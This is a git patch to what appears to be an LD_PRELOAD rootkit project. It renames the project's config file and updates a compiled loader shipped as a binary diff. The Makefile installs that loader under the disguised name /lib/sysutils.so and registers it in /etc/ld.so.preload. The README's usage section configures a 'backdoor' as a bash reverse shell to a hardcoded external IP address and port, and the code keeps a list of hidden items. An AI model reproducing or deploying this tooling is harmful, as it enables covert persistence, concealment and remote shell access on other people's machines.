From 9674b11045c3e258a3c06521194e230168aa6a7d Mon Sep 17 00:00:00 2001
From: alex0young <1141023622@qq.com>
Date: Mon, 26 Feb 2024 17:16:29 +0800
Subject: [PATCH] use init

---
 Makefile          |   2 +-
 Readme.md         |   4 ++--
 config.c          |   2 +-
 dist/loader.so    | Bin 21504 -> 17280 bytes
 example/ctest.c   |   2 +-
 example/uroot.cfg |   8 +++++---
 ldpre.c           |  17 +++++++++++++----
 uroot.cfg         |   6 ------
 util.c            |   2 +-
 9 files changed, 24 insertions(+), 19 deletions(-)
 delete mode 100644 uroot.cfg

diff --git a/Makefile b/Makefile
index 0530ba5..4557e71 100644
--- a/Makefile
+++ b/Makefile
@@ -6,6 +6,6 @@ dist/loader.so: $(SRCS) $(HEADERS)
 	gcc -shared -fPIC $(SRCS) -o $@ -ldl -lconfig -nostartfiles
 
 install:
-	cp uroot.cfg /etc/uroot.cfg
+	cp ukk_root.cfg /etc/ukk_root.cfg
 	cp dist/loader.so /lib/sysutils.so 
 	echo /lib/sysutils.so > /etc/ld.so.preload
\ No newline at end of file
diff --git a/Readme.md b/Readme.md
index 2d79454..a471b72 100644
--- a/Readme.md
+++ b/Readme.md
@@ -18,12 +18,12 @@ dist/loader.so: $(SRCS) $(HEADERS)
 	gcc -shared -fPIC $(SRCS) -o $@ -ldl -lconfig -nostartfiles
 
 install:
-	cp uroot.cfg /etc/uroot.cfg
+	cp ukk_root.cfg /etc/ukk_root.cfg
 	cp dist/loader.so /lib/sysutils.so 
 	echo /lib/sysutils.so > /etc/ld.so.preload
 ```
 ## USE
-uroot.cfg:
+ukk_root.cfg:
 ```shell
 backdoor = "bash -c 'bash -i >& /dev/tcp/123.249.89.38/50001 0>&1'";
 
diff --git a/config.c b/config.c
index c2132e8..f214d0b 100644
--- a/config.c
+++ b/config.c
@@ -5,7 +5,7 @@
 #include "log.h"
 #include "config.h"
 
-char* CONFIG_FILE = "/etc/uroot.cfg";
+char* CONFIG_FILE = "/etc/ukk_root.cfg";
 
 int init_cfg(struct Config* cfg){
   cfg->hidden = (const char**)malloc(sizeof(char*)); 
diff --git a/dist/loader.so b/dist/loader.so
index 917fe3476be4ff94232a47c0b764f9fbab930569..6a2e88a57d53509ef8cbe7bf3fdb2e24fa7435e4 100755
GIT binary patch
literal 17280
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
Xxk{?eyxCNw=(Zb`#z|Jx)NcPjNu7QW

literal 21504
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
